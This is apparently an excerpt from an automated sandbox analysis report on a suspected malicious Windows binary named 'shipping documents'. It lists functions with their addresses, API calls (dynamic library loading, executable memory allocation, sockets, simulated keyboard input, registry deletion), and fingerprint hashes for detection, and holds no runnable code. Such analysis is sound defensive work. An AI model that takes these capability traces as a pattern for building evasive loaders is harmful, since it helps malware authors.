Instruction Fuzzy Hash: A8219232A11118BFDF118F54DC85FEB37ABEF89754F018126F9159B290CA71AC518BA0

Function 006D797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006D79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006D79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006D7A03

Strings

msctls_trackbar32, xrefs: 006D79B8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 99b6ecf944338def7f795ff804591ef59637fca5914b11e9e236d0954b2df78b
Instruction ID: b21e2b68335c164cacf48b3d3464f34438bcea984dcffc294e99c8c25717195c
Opcode Fuzzy Hash: 99b6ecf944338def7f795ff804591ef59637fca5914b11e9e236d0954b2df78b
Instruction Fuzzy Hash: E411E372644208BAEF109F64CC05FEB37AAEF89764F02461AFA41A62D0E671D811DB64

Function 00654C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00654C2E), ref: 00654CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00654CB5

Strings

kernel32.dll, xrefs: 00654C9E
GetNativeSystemInfo, xrefs: 00654CAF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
Instruction ID: 6fb95732ec53a1bf4f5b5ac0b74410649ff0f8a23271b134060c084f6f643470
Opcode Fuzzy Hash: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
Instruction Fuzzy Hash: C6D01730911723CFD7209F31DE18A4676E7AF06796F16887B9897D6250EBB0D8C4CA50

Function 00654D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00654D2E,?,00654F4F,?,007162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00654D81

Strings

kernel32.dll, xrefs: 00654D6A
Wow64DisableWow64FsRedirection, xrefs: 00654D7B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 78bdcc5a0d1f2d4962b09c4e46d51e1939c5a5c9f1cbba2052282ff92aae0083
Instruction ID: b993f5fbf67233979e85193a508ad324b723c9d54c98ba107f43d38eacec4e9a
Opcode Fuzzy Hash: 78bdcc5a0d1f2d4962b09c4e46d51e1939c5a5c9f1cbba2052282ff92aae0083
Instruction Fuzzy Hash: ACD0C731900313CFC7208F30CC0864272EAAF00352F119A3B9883C2390EB78D8C0CA50

Function 00654D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00654CE1,?), ref: 00654DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00654DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00654DAE
kernel32.dll, xrefs: 00654D9D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: b3b1d271876d8eba7c27096309cd8181bc999aba5266a5fcc27401a08246340d
Instruction ID: d989cce969cb80a5a8d6ec2820d5022841e44f661681bef0410935446258b0bf
Opcode Fuzzy Hash: b3b1d271876d8eba7c27096309cd8181bc999aba5266a5fcc27401a08246340d
Instruction Fuzzy Hash: D1D01771950713CFD7209F31DC08A8676E6AF0535AF15897BD8D6D6290EB78D8C4CA50

Function 006D1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,006D12C1), ref: 006D1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006D1092

Strings

RegDeleteKeyExW, xrefs: 006D108C
advapi32.dll, xrefs: 006D107B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: ada41598f5d265b39206277ad4831a35cb8e33c4eaba45a1cce05fb312e9254d
Instruction ID: 01222601863fc796aa1676f88b0ac00ff6a78fc6ac358a55fac8a8112ca42582
Opcode Fuzzy Hash: ada41598f5d265b39206277ad4831a35cb8e33c4eaba45a1cce05fb312e9254d
Instruction Fuzzy Hash: 53D01270910713DFD7205F35DC2895676E5AF05751B158D3BA496DA290DBB4C4C0C650

Function 006C93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,006C9009,?,006DF910), ref: 006C9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006C9415

Strings

GetModuleHandleExW, xrefs: 006C940F
kernel32.dll, xrefs: 006C93FE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 40a1be481347d2222b30d7c92e5829bf27fb5d766a019ac07e2b8690a9ede7e3
Instruction ID: 4e06331262774ef4b1fc6b05f18a9b03b51df75debc2b2b46926526576280485
Opcode Fuzzy Hash: 40a1be481347d2222b30d7c92e5829bf27fb5d766a019ac07e2b8690a9ede7e3
Instruction Fuzzy Hash: 2BD01774910713DFDB209F31DD0CA5777E6AF06351B16C83FA496D6690EB74C880CA60

Function 00691B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00691B42
__swprintf.LIBCMT ref: 00691B73

Strings

WIN_XPe, xrefs: 00691BB2
%.3d, xrefs: 00691B4D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: ebf939cb4cb9dfbe16ca543e1928c15ce923b53a18bfb13ae88f9f9d4f4bfb56
Instruction ID: 9eb561e5c058d884cd4d3ebffcc53ecbae872f0e837e02f30303dc7fd5b4542c
Opcode Fuzzy Hash: ebf939cb4cb9dfbe16ca543e1928c15ce923b53a18bfb13ae88f9f9d4f4bfb56
Instruction Fuzzy Hash: B5D012B5C0421AEACF449B90DC449F9737FA709311F704593B90695848F2359B86AB25

Function 006A76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
Instruction ID: fbc0bb2aa491f38d835301b0608778fefb0dc17bbdb2af4eb2288bfcbbb8d8ed
Opcode Fuzzy Hash: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
Instruction Fuzzy Hash: 15C15B75A04216EFCB14EF94C884AAEB7B6FF49710B158599E806EB351D730EE81CF90

Function 006CE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 006CE3D2
CharLowerBuffW.USER32(?,?), ref: 006CE415

Part of subcall function 006CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006CE615
_memmove.LIBCMT ref: 006CE628

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: e810b2ef5f028704467b66985f418c04cd57947278ea16e017ee410caffe9914
Instruction ID: 88a2000208a8fa5b78866e898a62cef2a300da075a5676c761cb7fa0d71b400c
Opcode Fuzzy Hash: e810b2ef5f028704467b66985f418c04cd57947278ea16e017ee410caffe9914
Instruction Fuzzy Hash: F4C14A71A083019FC754DF28C480A6ABBF6FF48314F14896EF89A9B351D731E946CB92

Function 006C83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006C83D8
CoUninitialize.OLE32 ref: 006C83E3

Part of subcall function 006ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ADAC5

VariantInit.OLEAUT32(?), ref: 006C83EE
VariantClear.OLEAUT32(?), ref: 006C86BF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 3c407e941b8a49df3e51c9dbbfb7947ddab234b87d1b5c355e56eba87d9a500f
Instruction ID: a817634f3e95146adbf769e9eda779471b4ca6e9964a13a1aa7def60efab2687
Opcode Fuzzy Hash: 3c407e941b8a49df3e51c9dbbfb7947ddab234b87d1b5c355e56eba87d9a500f
Instruction Fuzzy Hash: FDA102752046019FCB60DF15C881B6AB7E6FF88314F08845DF99A9B3A1CB30ED05CB96

Function 006A6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006A6E04
SysAllocString.OLEAUT32(00000000), ref: 006A6EAD
VariantCopy.OLEAUT32 ref: 006A6EDC
VariantClear.OLEAUT32(?), ref: 006A6F03

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: f07f258b99e22929d0d1df8d94dc9a08cdb6806dce89a78a756243cd1b590a2b
Instruction ID: af4057041f62785fedc99d312c07f0962ca93f7a58f7ad0da8410102b6892201
Opcode Fuzzy Hash: f07f258b99e22929d0d1df8d94dc9a08cdb6806dce89a78a756243cd1b590a2b
Instruction Fuzzy Hash: 7F51E770608301DEDB60BF65D891A6AB3E7AF4A310F24881FF956CB291DB709C41DF25

Function 006D9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0132E110,?), ref: 006D9AD2
ScreenToClient.USER32(00000002,00000002), ref: 006D9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006D9B72

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 12346cc7ac2a1f0e2a84297cf8097ec45ddde18eb84d584c10ba002af9c3b532
Instruction ID: fff6dad7f54d078c52f321f2bb9ebf154b1415e133c7d5354d3c98196541b516
Opcode Fuzzy Hash: 12346cc7ac2a1f0e2a84297cf8097ec45ddde18eb84d584c10ba002af9c3b532
Instruction Fuzzy Hash: 1851FC35E01249AFCF14DF68D881AEE7BB6FB55360F15826AF8159B390D730AD41CBA0

Function 006C6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006C6CE4
WSAGetLastError.WSOCK32(00000000), ref: 006C6CF4

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006C6D58
WSAGetLastError.WSOCK32(00000000), ref: 006C6D64

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: b8bd99c7cec75160df151ed4d8b35abc4ee46a45e3fed4efd02fb085d9ee336f
Instruction ID: e6c1531364bc0716c37a0ede0ad57b7fce4772dd58acc3472fedd1acb5ed11b3
Opcode Fuzzy Hash: b8bd99c7cec75160df151ed4d8b35abc4ee46a45e3fed4efd02fb085d9ee336f
Instruction Fuzzy Hash: 21418274740200AFEB50AF24DC87F7A77E6DF44B10F44801DFA5AAB2D2DA719D048BA9

Function 006C672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006DF910), ref: 006C67BA
_strlen.LIBCMT ref: 006C67EC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 5fe4b8cc2c8587f92ef208895c8be9622f2c38539c2876a1456b40d432c6bf28
Instruction ID: c941c33257519e06dab5f8d6c7e49a02af0087eb75fc9f3f3d82f82f3fc0dd12
Opcode Fuzzy Hash: 5fe4b8cc2c8587f92ef208895c8be9622f2c38539c2876a1456b40d432c6bf28
Instruction Fuzzy Hash: 2141A231A01104ABCB54EB64DCD5FBEB3ABEF44314F14816DF91A9B292DB30AD05CB69

Function 006BBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006BBB09
GetLastError.KERNEL32(?,00000000), ref: 006BBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006BBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006BBB80

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8bafd03f70c27ddcec9ef3752e9e0ecd276283d6642ef36b40860e6664e5bc90
Instruction ID: a045812fc260efd76c2026ece1c74ea2fb28ebc4bec2873325632357f8aaa4f9
Opcode Fuzzy Hash: 8bafd03f70c27ddcec9ef3752e9e0ecd276283d6642ef36b40860e6664e5bc90
Instruction Fuzzy Hash: 4B413639600610DFCB10EF15C584A9DBBE2EF89310F098489EC8A9B362CB70FD45CBA5

Function 006D8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006D8B4D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 299da3fb10575fe3cae842c45fe1b07201670ecacbe32d707a283e472804aa0d
Instruction ID: 3236e7c6c96276287de3f71ebe8bfba19c292918ec089ef2b4d80310b9a6dba2
Opcode Fuzzy Hash: 299da3fb10575fe3cae842c45fe1b07201670ecacbe32d707a283e472804aa0d
Instruction Fuzzy Hash: 113190B4E00204BEEB219B18CC4DFE937A7EB05310F248517FA51D73E1CE30A9409B51

Function 006DADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006DAE1A
GetWindowRect.USER32(?,?), ref: 006DAE90
PtInRect.USER32(?,?,006DC304), ref: 006DAEA0
MessageBeep.USER32(00000000), ref: 006DAF11

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 92b57778c70e6eac728cc73e6d2caeb0848a22a7fb57422ef46b6c9f982e3b1e
Instruction ID: e72de18e74efc959d033382c5cada842129bbbf0c8b75875ece83e1f639eef4c
Opcode Fuzzy Hash: 92b57778c70e6eac728cc73e6d2caeb0848a22a7fb57422ef46b6c9f982e3b1e
Instruction Fuzzy Hash: B9416F70A08115DFCB11CF99C884BA9BBF6FB89350F1881AAE415DB351D730E942EB56

Function 006B0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006B1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 006B1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006B10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006B110B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
Instruction ID: 6024d2e2c68fd2dd5bea67f82806ab19ba82b76c2fbb0bfca1c1573cdd30cbc5
Opcode Fuzzy Hash: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
Instruction Fuzzy Hash: 8B3180B0E40698FEFF309B658C157FABBABAF46310F84432AF5815A2D0CB7449C19765

Function 006B1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 006B1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 006B1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 006B11F1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 006B1243

